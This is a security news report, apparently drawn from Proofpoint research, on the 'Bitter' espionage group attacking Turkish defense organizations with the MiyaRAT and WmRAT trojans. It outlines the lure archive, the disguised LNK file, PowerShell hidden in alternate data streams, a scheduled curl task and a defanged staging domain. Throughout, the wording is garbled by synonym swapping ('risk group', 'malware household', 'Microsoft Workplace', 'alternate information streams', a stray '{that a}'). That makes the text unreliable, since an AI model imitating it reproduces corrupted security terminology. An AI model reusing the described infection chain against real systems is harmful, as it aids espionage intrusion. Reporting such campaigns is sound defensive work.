A cyberespionage risk group often called ‘Bitter’ was noticed focusing on protection organizations in Turkey utilizing a novel malware household named MiyaRAT.
MiyaRAT is used alongside the WmRAT malware, which is cyberespionage malware beforehand related to Bitter.
Proofpoint found the marketing campaign and studies that the brand new malware is probably going reserved for high-value targets, deployed solely sporadically.
Bitter is a suspected South Asian cyberespionage risk group energetic since 2013, focusing on authorities and demanding organizations in Asia.
In 2022, they had been noticed by Cisco Talos in assaults towards the Bangladeshi authorities, utilizing a distant code execution flaw in Microsoft Workplace to drop trojans.
Final yr, Intezer reported that Bitter was impersonating the Embassy of Kyrgyzstan in Beijing in phishing assaults focusing on numerous Chinese language nuclear power firms and teachers.
Abusing alternate information streams
The assaults in Turkey began with an e mail containing a international funding mission lure, attaching a RAR archive.
The archive incorporates a decoy PDF file (~tmp.pdf), a shortcut file disguised as a PDF (PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk), and alternate information streams (ADS) embedded within the RAR file named “Participation” and “Zone.Identifier.”
If the recipient opens the LNK file, they set off the execution of PowerShell code hidden within the ADS, which opens the reliable decoy PDF for distraction. On the similar time, it creates a scheduled activity named “DsSvcCleanup” that runs a malicious curl command each 17 minutes.
The command reaches a staging area (jacknwoods[.]com) and awaits responses equivalent to instructions to obtain further payloads, carry out community reconnaissance, or steal information.
Proofpoint studies {that a} command to fetch WmRAT (anvrsa.msi) within the assault they examined was served inside 12 hours.
The WmRAT and MiyaRAT malware
Bitter first deployed WmRAT on the goal, however when it failed to ascertain communication with the command and management server, it downloaded MiyaRAT (gfxview.msi).
Each malware are C++ distant entry trojans (RATs) that present Bitter with information exfiltration, distant management, screenshot capturing, command execution (CMD or PowerShell), and system monitoring capabilities.
MiyaRAT is newer and customarily extra refined, that includes extra superior information and communications encryption, an interactive reverse shell, and enhanced listing and file management.
Its extra selective deployment by Bitter could point out that the risk actors reserve it for high-value targets, minimizing its publicity to analysts.
Indicators of compromise (IoCs) related to this assault are listed on the backside of Proofpoint’s report, whereas a YARA rule to assist detect the risk is out there right here.